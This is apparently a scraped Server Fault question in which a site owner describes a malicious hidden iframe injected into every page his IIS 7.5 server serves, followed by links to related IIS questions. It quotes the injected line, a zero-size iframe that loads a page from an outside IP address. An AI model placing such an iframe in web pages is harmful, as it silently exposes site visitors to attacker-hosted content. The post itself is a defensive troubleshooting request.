What is the technique used to make my IIS 7 serve all pages with an injected iframe

Posted by Andre Carlucci on Server Fault See other posts from Server Fault or by Andre Carlucci
Published on 2012-06-16T23:56:48Z Indexed on 2012/06/17 3:19 UTC
Read the original article Hit count: 222

Filed under:

iis7.5

Since my previous question was closed without an answer, I'm changing it a bit and asking again.

All my pages are being served with an malicious iframe injected just before the html tag.

The code looks like this:

<iframe src= http://117.21.247.171:700/1.htm width=0 height=0></iframe>                                                                                                                                                                                                                                   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pt-BR"> ...

Firstly I thought it could be something related with wordpress, but my asp.net sites are also infected and even if I create a static html file with nothing inside, the iframe is injected.

I'm using a Windows Server 2008 R2 Standard with IIS7.5 7600.

Anyone knows how to do this in IIS?

Related posts about iis7.5

Configuring IIS7 404 page when using IIS7 urlrewrite module

as seen on Pro Webmasters - Search for 'Pro Webmasters'
I've got custom errors to work for .aspx page like: www.domain.com/whateverdfdgdfg.aspx But, when no .aspx url is requested, (like http://www.domain.com/hfdkfdh4545) it results in an error: HTTP Error 404.0 - Not Found The resource you are looking for has been removed, had its name changed… >>> More
How to create a Subdomain in IIS7?

as seen on Server Fault - Search for 'Server Fault'
In IIS7 I have a site: http://www.mydomain.com/mysite How can I get the same site to appear as: http://mysite.mydomain.com ? I already have the DNS set up and can ping it, I just do not know how to configure it in IIS7. >>> More
How can I control which IP address IIS7 uses?

as seen on Server Fault - Search for 'Server Fault'
In Win2k3 I used httpcfg to tell IIS to listen to specific IP addresses on the server. I want to run Apache with VisualSVN Server on port 80 on another IP address but IIS7 binds to all ports by default. What utility for IIS7 controls the IIS7 bindings? Update: I found the answer. There is a utility… >>> More
WCF service hosted in IIS7 with administrator rights?

as seen on Server Fault - Search for 'Server Fault'
Hello, How do I grant administrator rights to a running WCF service hosted in IIS7? The problem is, my code works fine in a test console application runned as an administrator, but the same code used from WCF service in IIS7 fails. When I run the same console test application without admin rights… >>> More
authentication problem on windows vista (cookie is getting written but httpcontext.current.user is n

as seen on Stack Overflow - Search for 'Stack Overflow'
authentication problem on windows vista (iis7) (cookie is getting written but httpcontext.current.user is null) >>> More

Developer IT